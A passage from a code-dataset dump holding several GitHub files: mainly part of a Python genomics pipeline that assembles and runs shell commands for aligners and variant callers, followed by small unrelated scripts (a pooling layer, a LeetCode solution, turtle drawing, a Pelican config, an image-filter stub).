param:\r\n cmd += ' -l ' + str(param['min_len'])\r\n if 'min_complex' in param:\r\n cmd += ' -y -Y ' + str(param['min_complex'])\r\n if 'thread' in param:\r\n cmd += ' -w ' + str(param['thread'])\r\n return self.execCmd(cmd)\r\n \r\n def makeRGText(self, rginfo):\r\n rg = 'ID:' + rginfo['ID']\r\n for key in rginfo:\r\n if key != 'ID':\r\n rg += '\\\\t' + key + ':' + rginfo[key]\r\n return rg\r\n\r\n def hasFai(self, ref):\r\n return os.path.exists(ref+'.fai')\r\n\r\n def makeFai(self, ref):\r\n cmd = 'samtools faidx ' + ref\r\n return self.execCmd(cmd)\r\n\r\n def hasBWARefIndex(self, name):\r\n return os.path.exists(os.path.join(self.cfg.REFERENCE_DIR, name+'.pac'))\r\n\r\n def makeBWARefIndex(self, refpath, name):\r\n cmd = 'bwa index -p ' + os.path.join(self.cfg.REFERENCE_DIR, name) + ' ' + refpath\r\n return self.execCmd(cmd)\r\n \r\n def runBWA(self, seqtype='single', input=[], ref='', output='', \\\r\n option={'thread':8, 'checksr':True, 'refpath':None, 'addRG':False, 'rgroup':{}}):\r\n common.addPath(self.cfg.APPS_DIR)\r\n if not self.hasFai(option['refpath']):\r\n res = self.makeFai(option['refpath'])\r\n if not res:\r\n print(' Reference index (.fai) construction error.')\r\n return\r\n if not self.hasBWARefIndex(ref):\r\n res = self.makeBWARefIndex(option['refpath'], ref)\r\n if not res:\r\n print(' Reference transform error.')\r\n return\r\n cmd = 'bwa mem '\r\n if 'thread' in option:\r\n cmd += '-t '+str(option['thread'])\r\n if 'checksr' in option:\r\n cmd += ' -M'\r\n if 'addRG' in option and option['addRG']:\r\n cmd += ' -R \"@RG\\\\t' + self.makeRGText(option['rgroup']) + '\"'\r\n cmd += ' '+ref\r\n cmd += ' ' + input[0]\r\n if len(input) == 2 and os.path.exists(input[1]) and seqtype == 'paired':\r\n cmd += ' ' + input[1]\r\n cmd += ' > ' + output\r\n os.chdir(self.cfg.REFERENCE_DIR)\r\n return self.execCmd(cmd)\r\n\r\n def hasBowtRefIndex(self, refname):\r\n return os.path.exists(os.path.join(self.cfg.REFERENCE_DIR, refname + '.bt2'))\r\n\r\n def makeBowtRefIndex(self, refpath, refname, thread = 8):\r\n os.chdir(self.cfg.REFERENCE_DIR)\r\n cmd = 'bowtie2-build' + ' --threads ' + str(thread) + ' -f ' + refpath + ' ' + refname\r\n return self.execCmd(cmd)\r\n \r\n def runBowtie2(self, seqtype='single', input=[], ref='', output='', \\\r\n option={'thread':8, 'checksr':True, 'refpath':None, 'addRG':False, 'rgroup':{}}):\r\n os.chdir(self.cfg.WORK_SPACE)\r\n if not 
self.hasFai(option['refpath']):\r\n res = self.makeFai(option['refpath'])\r\n if not res:\r\n print(' Reference index (.fai) construction error.')\r\n return\r\n if not self.hasBowtRefIndex(ref):\r\n res = self.makeBowtRefIndex(option['refpath'], ref, option['thread'])\r\n os.chdir(self.cfg.WORK_SPACE)\r\n if not res:\r\n print(' Reference index construction error.')\r\n return\r\n cmd = 'bowtie2'\r\n if 'addRG' in option and option['addRG']:\r\n cmd += ' --rg-id ' + option['rgroup']['ID']\r\n for key in option['rgroup']:\r\n if key != 'ID':\r\n cmd += ' --rg ' + key + ':' + option['rgroup'][key]\r\n if seqtype == 'single' and os.path.exists(input[0]):\r\n cmd += ' -U '+input[0]\r\n elif seqtype == 'paired-end' and len(input) == 2 and \\\r\n os.path.exists(input[0]) and os.path.exists(input[1]):\r\n cmd += ' -1 '+input[0] + ' -2 '+input[1]\r\n if option['thread']:\r\n cmd += ' -p '+str(option['thread'])\r\n cmd += ' -x ' + ref + ' -S '+ output\r\n os.chdir(self.cfg.REFERENCE_DIR)\r\n return self.execCmd(cmd)\r\n\r\n def hasSTARRefIndex(self, refdir):\r\n return os.path.exists(refdir)\r\n\r\n def makeSTARRefIndex(self, refpath='', refname='', \\\r\n option={'thread':8, 'annotate':True, 'annotation':None}):\r\n cmd = 'STAR --runMode genomeGenerate' + \\\r\n ' --genomeDir ' + os.path.join(self.cfg.REFERENCE_DIR, refname) + ' --genomeFastaFiles ' + refpath\r\n if 'annotate' in option and option['annotate'] and os.path.exists(option['annotation']):\r\n cmd += ' --sjdbGTFfile ' + option['annotation']\r\n if option['thread']:\r\n cmd += ' --runThreadN ' + str(option['thread'])\r\n return self.execCmd(cmd)\r\n\r\n def runSTAR(self, seqtype='single', input=[], ref='', output='', \\\r\n option={'thread':8, 'annotate':True, 'annotation':None, 'refpath':None}):\r\n common.addPath(self.cfg.APPS_DIR)\r\n os.chdir(self.cfg.WORK_SPACE)\r\n if not self.hasFai(option['refpath']):\r\n res = self.makeFai(option['refpath'])\r\n if not res:\r\n print(' Reference index (.fai) construction error.')\r\n return\r\n if not self.hasSTARRefIndex(os.path.join(self.cfg.REFERENCE_DIR, ref)):\r\n self.makeSTARRefIndex(refpath = option['refpath'], refname = ref, option = option)\r\n cmd = 'STAR --outSAMtype BAM SortedByCoordinate' + \\\r\n ' --genomeDir ' + os.path.join(self.cfg.REFERENCE_DIR, ref)\r\n cmd += ' --readFilesIn'\r\n for f in input:\r\n cmd += ' ' + f \r\n if option['thread']:\r\n cmd += ' --runThreadN ' + str(option['thread'])\r\n cmd += ' --outFileNamePrefix ' + output\r\n return self.execCmd(cmd)\r\n\r\n def runSamtool2Fq(self, seqtype='single', input='', outdir='', outname = ''):\r\n os.chdir(self.cfg.WORK_SPACE)\r\n if seqtype == 'single':\r\n cmd = 'samtools fastq ' + input + ' > ' + os.path.join(outdir, outname + '.fq')\r\n else:\r\n cmd = 'samtools collate -u -O ' + input + ' | samtools fastq '\r\n cmd += ' -1 ' + os.path.join(outdir, outname + '_1.fq')\r\n cmd += ' -2 ' + os.path.join(outdir, outname + '_2.fq')\r\n cmd += ' -0 /dev/null -s /dev/null -n'\r\n return self.execCmd(cmd)\r\n\r\n def runSamtool2BAM(self, input='',output='',option={}):\r\n os.chdir(self.cfg.WORK_SPACE)\r\n cmd = 'samtools view'\r\n if 'thread' in option:\r\n cmd += ' -@ '+str(option['thread'])\r\n cmd += ' -b -o '+ os.path.join(self.cfg.OUT_DIR, output)+' ' + input\r\n return self.execCmd(cmd)\r\n\r\n def runSamtoolSort(self, input='', output='', option = {}):\r\n os.chdir(self.cfg.WORK_SPACE)\r\n cmd = 'samtools sort -l1 -T tmp'\r\n if 'thread' in option:\r\n cmd += ' -@ '+str(option['thread'])\r\n if 'ram' in option:\r\n cmd += ' 
-m '+str(1000 if option['ram'] > 1 else int(option['ram']*1000))+'M'\r\n cmd += ' -O bam -o '+output + ' ' + input\r\n return self.execCmd(cmd)\r\n\r\n def runSamtoolIndex(self, input=''):\r\n os.chdir(self.cfg.WORK_SPACE)\r\n cmd = 'samtools index '+ input\r\n return self.execCmd(cmd)\r\n\r\n def runPicardMD(self, input='', output='', metric = ''):\r\n common.addPath(self.cfg.APPS_DIR)\r\n os.chdir(self.cfg.WORK_SPACE)\r\n cmd = 'java -jar '+os.path.join(self.cfg.APPS_DIR,'picard.jar') + ' MarkDuplicates'\r\n cmd += ' -I ' + input\r\n cmd += ' -O ' + output\r\n cmd += ' -M ' + metric\r\n return self.execCmd(cmd)\r\n\r\n def runTVC(self, input = '', output = '', ref = '', \r\n option = { 'param' : '', 'motif' : '', 'thread':8, 'target':None, 'hotspot': None }):\r\n common.addPath(os.path.join(self.cfg.APPS_DIR,'TVC', 'bin'))\r\n os.chdir(self.cfg.WORK_SPACE)\r\n cmd = 'python2 ' + os.path.join(self.cfg.APPS_DIR, 'TVC', 'bin', 'variant_caller_pipeline.py') + \\\r\n ' --input-bam '+input + \\\r\n ' --reference-fasta ' + ref + \\\r\n ' --parameters-file ' + option['param'] + \\\r\n ' --error-motifs ' + option['motif'] + \\\r\n ' --generate-gvcf'\r\n if 'target' in option and option['target']:\r\n cmd += ' --region-bed ' + option['target']\r\n if 'hotspot' in option and option['hotspot']:\r\n cmd += ' --hotspot-vcf ' + option['hotspot']\r\n if 'control' in option and option['control']:\r\n cmd += ' --normal-bam ' + option['control']\r\n if 'thread' in option and 1 < option['thread']:\r\n cmd += ' --num-threads ' + str(option['thread'])\r\n cmd += ' --output-dir ' + output\r\n return self.execCmd(cmd)\r\n\r\n def runBCFVarCall(self, input = '', output = '', ref = '', option = {}):\r\n os.chdir(self.cfg.WORK_SPACE)\r\n cmd = 'bcftools mpileup -Ou' + \\\r\n ' -f ' + ref + ' ' + input + \\\r\n ' | bcftools call -vm -Oz -o ' + output + '.vcf.gz'\r\n return self.execCmd(cmd)\r\n \r\n def hasGATKRefDict(self, refpath = ''):\r\n fname, ext = os.path.splitext(os.path.basename(refpath))\r\n return os.path.exists(os.path.join(self.cfg.REFERENCE_DIR, fname + '.dict'))\r\n\r\n def makeGATKRefDict(self, refpath = ''):\r\n cmd = 'gatk CreateSequenceDictionary -R ' + refpath\r\n return self.execCmd(cmd)\r\n\r\n def hasGATKFeatureIndex(self, feature):\r\n return os.path.exists(feature + '.idx')\r\n \r\n def makeGATKFeatureIndex(self, feature):\r\n cmd = 'gatk IndexFeatureFile -I ' + feature\r\n return self.execCmd(cmd)\r\n\r\n def runGATKBRecal(self, input = '', output = '', ref = '', known = '', option={}):\r\n common.addPath(os.path.join(self.cfg.APPS_DIR,'gatk'))\r\n os.chdir(self.cfg.WORK_SPACE)\r\n if not self.hasGATKRefDict(ref):\r\n res = self.makeGATKRefDict(ref)\r\n if not res:\r\n print(' Reference dictionary (.dict) construction error.')\r\n if not self.hasGATKFeatureIndex(known):\r\n res = self.makeGATKFeatureIndex(known)\r\n if not res:\r\n print(' Feature index construction error.')\r\n gatkcmd = 'gatk'\r\n if 'ram' in option:\r\n gatkcmd += ' --java-options \"-Xmx' + str(option['ram'])+'g\"'\r\n cmd = gatkcmd + ' BaseRecalibrator'\r\n cmd += ' -R ' + ref\r\n cmd += ' -I ' + input\r\n cmd += ' --known-sites ' + known\r\n cmd += ' -O ' + output+'_brecal.table'\r\n res = self.execCmd(cmd)\r\n if not res:\r\n return\r\n cmd = gatkcmd + ' ApplyBQSR'\r\n cmd += ' -R ' + ref\r\n cmd += ' -I ' + input\r\n cmd += ' -bqsr ' + output+'_brecal.table'\r\n cmd += ' -O ' + output\r\n return self.execCmd(cmd)\r\n\r\n def runGATKVarCall(self, input = '', output = '', ref = '', option={}):\r\n 
common.addPath(os.path.join(self.cfg.APPS_DIR, 'gatk'))\r\n os.chdir(self.cfg.WORK_SPACE)\r\n if not self.hasGATKRefDict(ref):\r\n res = self.makeGATKRefDict(ref)\r\n if not res:\r\n print(' Reference dictionary (.dict) construction error.')\r\n cmd = 'gatk'\r\n if 'ram' in option:\r\n cmd += ' --java-options \"-Xmx' + str(option['ram'])+'g\"'\r\n cmd += ' HaplotypeCaller'\r\n if 'target' in option and os.path.exists(option['target']):\r\n cmd += ' -L ' + option['target']\r\n cmd += ' -R ' + ref + \\\r\n ' -I ' + input + \\\r\n ' -O ' + output + \\\r\n '.g.vcf.gz -ERC GVCF -G StandardAnnotation -G AS_StandardAnnotation -G StandardHCAnnotation'\r\n res = self.execCmd(cmd)\r\n if not res:\r\n print(' Failed to export gvcf.')\r\n return\r\n cmd = 'gatk'\r\n if 'ram' in option:\r\n cmd += ' --java-options \"-Xmx' + str(option['ram'])+'g\"'\r\n cmd += ' GenotypeGVCFs'\r\n cmd += ' -R ' + ref + \\\r\n ' -V ' + output + '.g.vcf.gz' + \\\r\n ' -O ' + output + '.vcf.gz'\r\n return self.execCmd(cmd)\r\n \r\n def runGATKVRecal(self, input = '', output = '', ref = '', resources = [], option={}):\r\n common.addPath(os.path.join(self.cfg.APPS_DIR, 'gatk'))\r\n os.chdir(self.cfg.WORK_SPACE)\r\n gatkcmd = 'gatk'\r\n if 'ram' in option:\r\n gatkcmd += ' --java-options \"-Xmx' + str(option['ram'])+'g\"'\r\n cmd = gatkcmd + ' VariantRecalibrator'\r\n cmd += ' -R ' + ref + \\\r\n ' -V ' + input + \\\r\n ' -O ' + output + '_snp.recal'\r\n for resource in resources:\r\n cmd += ' --resource ' + resource\r\n cmd += ' -tranche 100.0 -tranche 99.9 -tranche 99.0 -tranche 90.0 -an QD -an MQ -an MQRankSum -an ReadPosRankSum -an FS -an SOR -mode SNP'\r\n cmd += ' --tranches-file ' + output + '_snp.tranches'\r\n res = self.execCmd(cmd)\r\n if not res:\r\n print(' Variant(SNP) recalibration has failed.')\r\n return\r\n cmd = gatkcmd + ' ApplyVQSR'\r\n cmd += ' -V ' + input\r\n cmd += ' --recal-file ' + output + '_snp.recal'\r\n cmd += ' --tranches-file ' + output + '_snp.tranches'\r\n cmd += ' -O ' + output + '_snp.vcf'\r\n cmd += ' -mode SNP -truth-sensitivity-filter-level 99.5 --create-output-variant-index true'\r\n res = self.execCmd(cmd)\r\n if not res:\r\n print(' Variant(SNP) recalibration apply has failed.')\r\n return\r\n cmd = gatkcmd + ' VariantRecalibrator'\r\n cmd += ' -R ' + ref + \\\r\n ' -V ' + input + \\\r\n ' -O ' + output + '_indel.recal'\r\n for resource in resources:\r\n cmd += ' --resource ' + resource\r\n cmd += ' -tranche 100.0 -tranche 99.9 -tranche 99.0 -tranche 90.0 -an QD -an MQ -an MQRankSum -an ReadPosRankSum -an FS -an SOR -mode INDEL'\r\n cmd += ' --tranches-file ' + output + '_indel.tranches'\r\n res = self.execCmd(cmd)\r\n if not res:\r\n print(' Variant(InDel) recalibration has failed.')\r\n return\r\n cmd = gatkcmd + ' ApplyVQSR'\r\n cmd += ' -V ' + input\r\n cmd += ' --recal-file ' + output + '_indel.recal'\r\n cmd += ' --tranches-file ' + output + '_indel.tranches'\r\n cmd += ' -O ' + output + '_indel.vcf'\r\n cmd += ' -mode INDEL -truth-sensitivity-filter-level 99.0 --create-output-variant-index true'\r\n res = self.execCmd(cmd)\r\n if not res:\r\n print(' Variant(InDel) recalibration apply has failed.')\r\n return\r\n cmd = gatkcmd + ' GatherVcfs -R ' + ref\r\n cmd += ' -I ' + output + '_indel.vcf -I ' + output + '_snp.vcf'\r\n cmd += ' -O ' + output + '_recal.vcf'\r\n return self.execCmd(cmd)\r\n \r\n def runGDVCall(self, input = '', output = '', ref = '', \\\r\n option={'gpu': False, 'processor':4, 'target': ''}):\r\n os.chdir(self.cfg.WORK_SPACE)\r\n idir, iname = os.path.split(input)\r\n 
odir, oname = os.path.split(output)\r\n rdir, rname = os.path.split(ref)\r\n tdir = ''\r\n tname = ''\r\n if 'target' in option:\r\n tdir, tname = os.path.split(option['target'])\r\n cmd = 'sudo docker run'\r\n if 'gpu' in option and option['gpu']:\r\n cmd += ' --gpus 1'\r\n cmd += ' -v \"' + rdir + '\":\"/REF_DIR\"' \r\n cmd += ' -v \"' + idir + '\":\"/INPUT_DIR\"' \r\n cmd += ' -v \"' + odir + '\":\"/OUTPUT_DIR\"' \r\n if tdir != '':\r\n cmd += ' -v \"' + tdir + '\":\"/TARGET_DIR\"' \r\n cmd +=' google/deepvariant:\"' + self.cfg.SOFTWARE_INFO['GDV']['ver'] + '\"' + \\\r\n ' /opt/deepvariant/bin/run_deepvariant --model_type=WGS' \r\n cmd += ' --ref ' + os.path.join('/REF_DIR', rname)\r\n cmd += ' --reads ' + os.path.join('/INPUT_DIR', iname)\r\n if 'target' in option and os.path.exists(option['target']):\r\n cmd += ' --regions ' + os.path.join('/TARGET_DIR', tname)\r\n if 'processor' in option and 0 < option['processor']:\r\n cmd += ' --num_shards ' + str(option['processor'])\r\n cmd += ' --output_gvcf ' + os.path.join('/OUTPUT_DIR', oname+'.g')\r\n cmd += ' --output_vcf ' + os.path.join('/OUTPUT_DIR', oname)\r\n return self.execCmd(cmd)\r\n\r\n def runHTSeqCount(self, input = '', annotation = '', output = '', option = {}):\r\n os.chdir(self.cfg.WORK_SPACE)\r\n cmd = 'htseq-count -r pos -t exon -f bam'\r\n if 'qual' in option:\r\n cmd += ' -a ' + str(option['qual'])\r\n if 'thread' in option:\r\n cmd += ' -n ' + str(option['thread'])\r\n cmd += ' ' + input + ' ' + annotation + ' > ' + output\r\n return self.execCmd(cmd)\r\n\r\n def runCufflinks(self, input = '', annotation = '', output = '', option = {}):\r\n common.addPath(os.path.join(self.cfg.APPS_DIR, 'cuff'))\r\n os.chdir(self.cfg.WORK_SPACE)\r\n cmd = 'cufflinks --no-update-check'\r\n if 'platform' in option:\r\n if option['platform'] == 'ion':\r\n cmd += ' --library-type fr-secondstrand'\r\n else:\r\n cmd += ' --library-type fr-unstranded'\r\n if 'novel' in option and option['novel']:\r\n cmd += ' -g ' + annotation\r\n else:\r\n cmd += ' -G ' + annotation\r\n if 'mask' in option and os.path.exists(option['mask']):\r\n cmd += ' -M ' + option['mask']\r\n if 'thread' in option:\r\n cmd += ' -p ' + str(option['thread'])\r\n cmd += ' -o ' + output + ' ' + input\r\n return self.execCmd(cmd)\r\n \r\n def runCuffDiff(self, input = '', groups = [], labels = [], reference = '', output = '', option = {}):\r\n common.addPath(os.path.join(self.cfg.APPS_DIR, 'cuff'))\r\n os.chdir(self.cfg.WORK_SPACE)\r\n cmd = 'cuffdiff --no-update-check'\r\n if 'platform' in option:\r\n if option['platform'] == 'ion':\r\n cmd += ' --library-type fr-secondstrand'\r\n else:\r\n cmd += ' --library-type fr-unstranded'\r\n if 'mask' in option and os.path.exists(option['mask']):\r\n cmd += ' -M ' + option['mask']\r\n if 'mincount' in option:\r\n cmd += ' -c ' + str(option['mincount'])\r\n if 'thread' in option:\r\n cmd += ' -p ' + str(option['thread'])\r\n if 'control' in option and option['control']:\r\n cmd += ' -g ' + option['control']\r\n cmd += ' -u -b ' + reference + ' -o ' + output\r\n for label in labels:\r\n cmd += label + ','\r\n cmd = cmd[:-1] + ' '\r\n cmd += input\r\n for group in groups:\r\n cmd += ' '\r\n for reads in group:\r\n cmd += reads + ','\r\n cmd = cmd[:-1]\r\n return self.execCmd(cmd)\r\n\r\n def runCuffMerge(self, input = '', reference = '', option = {}):\r\n common.addPath(os.path.join(self.cfg.APPS_DIR, 'cuff'))\r\n os.chdir(self.cfg.WORK_SPACE)\r\n cmd = 'cuffmerge --no-update-check'\r\n if 'thread' in option:\r\n cmd += ' -p ' + 
str(option['thread'])\r\n cmd += ' -s ' + reference + ' ' + input\r\n return self.execCmd(cmd)\r\n\r\n def runEdgeR(self, script = '', output = '', args = []):\r\n os.chdir(self.cfg.WORK_SPACE)\r\n return self.runRScript(script, output, args)\r\n\r\n def runMACS2(self, input = '', control = None, output = '', species = '', genome = 0, \r\n option = { 'bload' : True, 'lambda' : True, 'p-val' : -1, 'q-val': -1}):\r\n os.chdir(self.cfg.WORK_SPACE)\r\n cmd = 'macs2 callpeak -f BAM -t ' + input\r\n if control :\r\n cmd += ' -c ' + control\r\n if len(species) : \r\n cmd += ' -g ' + species\r\n else :\r\n cmd += ' -g ' + '{:.1E}'.format(genome)\r\n if not option['bload']:\r\n cmd += ' --broad'\r\n if not option['lambda']:\r\n cmd += ' --nolambda'\r\n if 'p-val' in option and -1 < option['p-val']:\r\n cmd += ' -p ' + '{:.1E}'.format(option['p-val'])\r\n if 'q-val' in option and -1 < option['q-val']:\r\n cmd += ' -q ' + '{:.1E}'.format(option['q-val'])\r\n cmd += ' --outdir ' + self.cfg.OUT_DIR + ' -n ' + output\r\n return self.execCmd(cmd)\r\n\r\n#def runMeme():\r\n\r\n\r\n","repo_name":"YujiSue/ysngs","sub_path":"ysngs/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":20807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"34160032230","text":"# Write a program that displays integer numbers in the range of <1..20>.\n\n# for number in range(1,21):\n# print(number,end=\" \")\n\nnumber = 1\nwhile number <= 20:\n print(number, end=\" \")\n number += 1\n\n#zaczynamy od 1 (nu,ber =1) i po każdym przejściu zwiększamy wartość o 1 (nu,ber += 1)\n#end=\" \" dodanie spacji, wszystko w jednym wierszu, zamiast każdego wykonania w osobnym","repo_name":"Hybrydyzacja/pp1_2022","sub_path":"03-ControlStructures/11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"7382429742","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\n\nfrom .base import Layer\nfrom ztlearn.utils import get_pad\nfrom ztlearn.utils import im2col_indices\nfrom ztlearn.utils import col2im_indices\nfrom ztlearn.utils import get_output_dims\n\n\nclass Pool(Layer):\n\n def __init__(self, pool_size = (2, 2), strides = (1, 1), padding = 'valid'):\n self.pool_size = pool_size\n self.strides = strides\n self.padding = padding\n\n self.is_trainable = True\n\n @property\n def trainable(self):\n return self.is_trainable\n\n @trainable.setter\n def trainable(self, is_trainable):\n self.is_trainable = is_trainable\n\n @property\n def output_shape(self):\n input_channels, input_height, input_width = self.input_shape\n\n self.pad_height, self.pad_width = get_pad(self.padding,\n input_height,\n input_width,\n self.strides[0],\n self.strides[1],\n self.pool_size[0],\n self.pool_size[1])\n\n output_height, output_width = get_output_dims(input_height, input_width, self.pool_size, self.strides, self.padding)\n\n assert output_height % 1 == 0\n assert output_width % 1 == 0\n\n return input_channels, int(output_height), int(output_width)\n\n def prep_layer(self): pass\n\n def pass_forward(self, inputs, train_mode = True, **kwargs):\n input_num, input_depth, input_height, input_width = inputs.shape\n self.inputs = inputs\n\n assert (input_height - self.pool_size[0]) % self.strides[0] == 0, 'Invalid height'\n assert (input_width - self.pool_size[1]) % self.strides[1] == 0, 'Invalid width'\n\n output_height, output_width = get_output_dims(input_height, input_width, 
self.pool_size, self.strides)\n\n input_reshaped = inputs.reshape(input_num * input_depth, 1, input_height, input_width)\n self.input_col = im2col_indices(input_reshaped,\n self.pool_size[0],\n self.pool_size[1],\n padding = (self.pad_height, self.pad_width),\n stride = self.strides[0])\n\n output, self.pool_cache = self.pool_forward(self.input_col)\n\n output = output.reshape(int(output_height), int(output_width), input_num, input_depth)\n\n return output.transpose(2, 3, 0, 1)\n\n def pass_backward(self, grad, epoch_num, batch_num, batch_size):\n input_num, input_depth, input_height, input_width = self.inputs.shape\n\n d_input_col = np.zeros_like(self.input_col)\n grad_col = grad.transpose(2, 3, 0, 1).ravel()\n\n d_input_col = self.pool_backward(d_input_col, grad_col, self.pool_cache)\n d_input = col2im_indices(d_input_col,\n (input_num * input_depth, 1, input_height, input_width),\n self.pool_size[0],\n self.pool_size[1],\n padding = (self.pad_height, self.pad_width),\n stride = self.strides[0])\n\n return d_input.reshape(self.inputs.shape)\n\n\nclass MaxPooling2D(Pool):\n\n def __init__(self, pool_size = (2, 2), strides = (1, 1), padding = 'valid'):\n super(MaxPooling2D, self).__init__(pool_size, strides, padding)\n\n def pool_forward(self, input_col):\n max_id = np.argmax(input_col, axis = 0)\n out = input_col[max_id, range(max_id.size)]\n\n return out, max_id\n\n def pool_backward(self, d_input_col, grad_col, pool_cache):\n d_input_col[pool_cache, range(grad_col.size)] = grad_col\n\n return d_input_col\n\n\nclass AveragePool2D(Pool):\n\n def __init__(self, pool_size = (2, 2), strides = (1, 1), padding = 'valid'):\n super(AveragePool2D, self).__init__(pool_size, strides, padding)\n\n def pool_forward(self, input_col):\n out = np.mean(input_col, axis = 0)\n\n return out, None\n\n def pool_backward(self, d_input_col, grad_col, pool_cache = None):\n d_input_col[:, range(grad_col.size)] = 1. / d_input_col.shape[0] * grad_col\n\n return d_input_col\n","repo_name":"jefkine/zeta-learn","sub_path":"ztlearn/dl/layers/pooling.py","file_name":"pooling.py","file_ext":"py","file_size_in_byte":4610,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"71"} +{"seq_id":"5931164070","text":"# Write a function that takes a string as input and reverse only the vowels of a string.\n\n# Example 1:\n# Given s = \"hello\", return \"holle\".\n\n# Example 2:\n# Given s = \"leetcode\", return \"leotcede\".\n\n# Note:\n# The vowels does not include the letter \"y\".\n\n\n\nclass Solution(object):\n def reverseVowels(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n vowels = set('aeiouAEIOU')\n i, j = 0, len(s)-1\n s = list(s)\n while i < j:\n if s[i] in vowels and s[j] in vowels:\n s[i], s[j] = s[j], s[i]\n i += 1\n j -= 1\n elif s[i].lower() in vowels:\n j -= 1\n elif s[j].lower() in vowels:\n i += 1\n else:\n i += 1\n j -= 1\n return ''.join(s)\n ","repo_name":"yemao616/summer18","sub_path":"Google/1. easy/345. Reverse Vowels of a String.py","file_name":"345. 
Reverse Vowels of a String.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"17682146614","text":"import turtle\nimport os\n\ndef star(t, angle, side, limit, turningPoint = 200):\n t.forward(side)\n if side % (turningPoint*2) == 0:\n angle += 2\n elif side % turningPoint == 0:\n angle -= 2\n\n t.right(angle)\n side += 2\n\n if side < limit:\n star(t, angle, side, limit)\n\ndef draw(angle, side, limit, turningPoint = 200, save = False, filename = None):\n window = turtle.Screen()\n window.bgcolor(\"black\")\n t = turtle.Turtle()\n t.pencolor(\"white\")\n t.width(1)\n turtle.tracer(100, None)\n star(t, angle, side, limit, turningPoint)\n if save and filename != None:\n path = os.getcwd() + r\"\\\\\"\n cv = turtle.getscreen().getcanvas()\n cv.postscript(file = path + filename + \".ps\", colormode=\"color\")\n turtle.clearscreen()\n\nfor i in [119, 120, 121, 110, 135, 140, 180]:\n draw(i, 0, 1200, 200, save=True, filename=f\"star{i}\")","repo_name":"rAlphabet/CreativePie","sub_path":"Geometric Rose/stars.py","file_name":"stars.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"} +{"seq_id":"24921915778","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\nfrom __future__ import unicode_literals\n\nAUTHOR = 'calvin.zhang'\nSITENAME = \"zjlog is zj'blog\"\nSITEURL = ''\nPATH = 'content'\n\n# theme and plugins config\nTHEME = \"./themes/pelican-elegant\" \nMARKUP = ('md', 'ipynb')\nPLUGIN_PATHS = [ './plugins' ]\nPLUGINS = ['ipynb.markup','tipue_search','sitemap','extract_toc']\nSTATIC_PATHS = ['theme/images', 'images']\nSITEMAP = { \n 'format': 'xml', \n 'priorities': { \n 'articles': 1, \n 'indexes': 0.7, \n 'pages': 0.5 \n }, \n 'changefreqs': { \n 'articles': 'always', \n 'indexes': 'always', \n 'pages': 'always' \n } \n} \nDIRECT_TEMPLATES = (('index', 'tags', 'categories','archives', 'search', '404'))\n\n# About & project\n\nLANDING_PAGE_ABOUT = {\n \"title\":\"数据挑山工\",\n \"details\":\"hello\"\n}\n\nPROJECTS = [{\n 'name': 'Logpad + Duration',\n 'url': 'https://github.com/talha131/logpad-plus-duration#logpad--duration',\n 'description': 'Vim plugin to emulate Windows Notepad logging feature,'\n ' and log duration of each entry'},\n {'name': 'Elegant Theme for Pelican',\n 'url': 'http://oncrashreboot.com/pelican-elegant',\n 'description': 'A clean and distraction free theme, with search and a'\n ' lot more unique features, using Jinja2 and Bootstrap'}]\n\nTIMEZONE = 'Asia/Shanghai'\nDEFAULT_LANG = 'zh'\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = None\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\n# Blogroll\nLINKS = (('Pelican', 'http://getpelican.com/'),\n ('Python.org', 'http://python.org/'),\n ('Jinja2', 'http://jinja.pocoo.org/'),\n ('You can modify those links in your config file', '#'),)\n\n# Social widget\nSOCIAL = (('You can add links in your config file', '#'),\n ('Another social link', '#'),)\n\nDEFAULT_PAGINATION = False\n\n# Uncomment following line if you want document-relative URLs when developing\n#RELATIVE_URLS = True\n","repo_name":"zjplus/zjplus.github.io-source","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":2969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} 
+{"seq_id":"4006786401","text":"import sys\n\n\ndef kernel_do_filtro(nome_filtro):\n \"\"\"\n Entrada: Uma string que representa um nome de um filtro\n Saída: O uma matriz que representa o'Kernel' correspondente \n ao nome do filtro recebido\n \"\"\"\n\n kernels_filtros = [\n [\n [-1, -1, -1],\n [-1, 8, -1],\n [-1, -1, -1]\n ],\n [\n [0, -1, 0],\n [-1, 5, -1],\n [0, -1, 0]\n ],\n [\n [1, 0, -1],\n [2, 0, -2],\n [1, 0, -1]\n ],\n [\n [-2, -1, 0],\n [-1, 1, 1],\n [0, 1, 2]\n ],\n [\n [0.04, 0.04, 0.04, 0.04, 0.04],\n [0.04, 0.04, 0.04, 0.04, 0.04],\n [0.04, 0.04, 0.04, 0.04, 0.04],\n [0.04, 0.04, 0.04, 0.04, 0.04],\n [0.04, 0.04, 0.04, 0.04, 0.04]\n ],\n [\n [-0.00390625, -0.015625, -0.0234375, -0.015625, -0.00390625],\n [-0.015625, -0.0625, -0.09375, -0.0625, -0.015625],\n [-0.0234375, -0.09375, 1.859375, -0.09375, -0.0234375],\n [-0.015625, -0.0625, -0.09375, -0.0625, -0.015625],\n [-0.00390625, -0.015625, -0.0234375, -0.015625, -0.00390625]\n ]\n ]\n\n nome_filtros = [\n \"bordas\",\n \"sharpen\",\n \"left_sobel\",\n \"emboss\",\n \"blur\",\n \"unsharp\"\n ]\n\n return kernels_filtros[nome_filtros.index(nome_filtro)]\n\n\ndef ler_imagem(nome_imagem):\n \"\"\"\n Entrada: Um caminho de um arquivo ppm\n Saída: A largura, a altura e a matriz com os números que \n correspondem a imagem em si\n \"\"\"\n\n 